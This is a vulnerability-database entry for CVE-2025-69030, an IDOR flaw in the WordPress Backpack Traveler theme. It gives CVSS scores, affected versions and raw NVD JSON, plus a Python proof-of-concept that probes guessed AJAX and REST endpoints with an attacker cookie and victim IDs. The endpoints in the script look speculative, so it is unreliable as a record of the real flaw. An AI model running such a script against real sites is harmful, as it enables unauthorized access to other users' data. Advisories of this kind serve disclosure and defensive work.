Security Vulnerability Report
中文
CVE-2025-69030 CVSS 5.4 MEDIUM

CVE-2025-69030

Published: 2025-12-30 11:16:02
Last Modified: 2026-04-27 20:16:26

Description

Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Backpack Traveler backpacktraveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backpack Traveler: from n/a through <= 2.10.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:backpack_traveler:*:*:*:*:*:wordpress:*:* - VULNERABLE
Backpack Traveler <= 2.10.3
Mikado-Themes Backpack Traveler all versions through n/a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69030 PoC - Backpack Traveler IDOR Vulnerability # Author: Security Researcher # Target: WordPress Backpack Traveler Theme <= 2.10.3 import requests import argparse from urllib.parse import urljoin def exploit_idor(target_url, attacker_cookie, victim_resource_id): """ Exploit IDOR vulnerability in Backpack Traveler theme by manipulating resource identifiers to access unauthorized data """ # Target endpoints that may be vulnerable endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users/', '/wp-json/backpack/v1/', ] headers = { 'Cookie': attacker_cookie, 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } print(f"[*] Testing IDOR on {target_url}") print(f"[*] Target resource ID: {victim_resource_id}") # Test various IDOR scenarios payloads = [ {'action': 'get_booking_details', 'booking_id': victim_resource_id}, {'action': 'get_user_profile', 'user_id': victim_resource_id}, {'id': victim_resource_id}, ] for endpoint in endpoints: full_url = urljoin(target_url, endpoint) for payload in payloads: try: if 'action' in payload: response = requests.post(full_url, data=payload, headers=headers, timeout=10) else: response = requests.get(full_url + str(victim_resource_id), headers=headers, timeout=10) if response.status_code == 200 and 'user' in response.text.lower(): print(f"[+] Potential IDOR found at {full_url}") print(f"[+] Response snippet: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-69030 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-c', '--cookie', required=True, help='Attacker session cookie') parser.add_argument('-r', '--resource', required=True, help='Victim resource ID') args = parser.parse_args() exploit_idor(args.url, args.cookie, args.resource) # Usage: python cve-2025-69030.py -u http://target.com -c "wordpress_logged_in=xxx" -r 1

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69030", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:01.590", "lastModified": "2026-04-27T20:16:25.930", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Backpack Traveler backpacktraveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Backpack Traveler: from n/a through <= 2.10.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:backpack_traveler:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "2.10.3", "matchCriteriaId": "8FD0E4B0-56C1-44EF-BFFF-3E4D35EABD40"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/backpacktraveler/vulnerability/wordpress-backpack-traveler-theme-2-10-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}